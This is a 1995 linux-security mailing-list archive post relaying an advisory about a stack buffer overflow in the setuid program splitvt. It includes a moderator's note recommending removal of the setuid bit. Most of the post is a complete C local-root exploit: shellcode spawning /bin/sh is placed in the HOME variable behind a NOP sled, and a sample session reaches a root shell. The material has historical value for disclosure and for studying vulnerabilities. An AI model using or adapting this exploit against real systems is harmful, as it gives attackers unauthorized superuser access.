[515] in linux-security and linux-alert archive
Avalon Release
daemon@ATHENA.MIT.EDU (root)
Tue Dec 12 08:00:17 1995
Date: Sun, 3 Dec 1995 22:52:37 -0700 (MST)
From: root <root@crimson.cadvision.com>
To: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
cc: linux-alert@tarsier.cv.nrao.edu, linux-security@tarsier.cv.nrao.edu,
bugtraq@crimelab.com, big-linux@netspace.org
In-Reply-To: <199512040028.TAA06752@tarsier.cv.nrao.edu>
Reply-To: linux-security@tarsier.cv.nrao.edu
[mod: This should have been approved to linux-alert a few days ago, but it
somehow escaped me. I'm very sorry for the delay.
At least Slackware 3.0 seems affected (but it doesn't seem to work
for all users alike). Red Hat doesn't have splitvt; the status of
other systems is not known. The simplest fix is to remove the
setuid bit from splitvt.
--okir]
Avalon Security Research
Release 1.3
(splitvt)
Affected Program: splitvt(1)
Affected Operating Systems: Linux 2-3.X
Exploitation Result: Local users can obtain superuser privelages.
Bug Synopsis: A stack overflow exists via user defined unbounds checked
user supplied data sent to a sprintf().
Syntax:
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
Credit: Full credit for this bug (both the research and the code)
goes to Dave G. & Vic M. Any questions should be directed to
mcpheea@cadvision.com .
----------------------------------------------------------------------------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
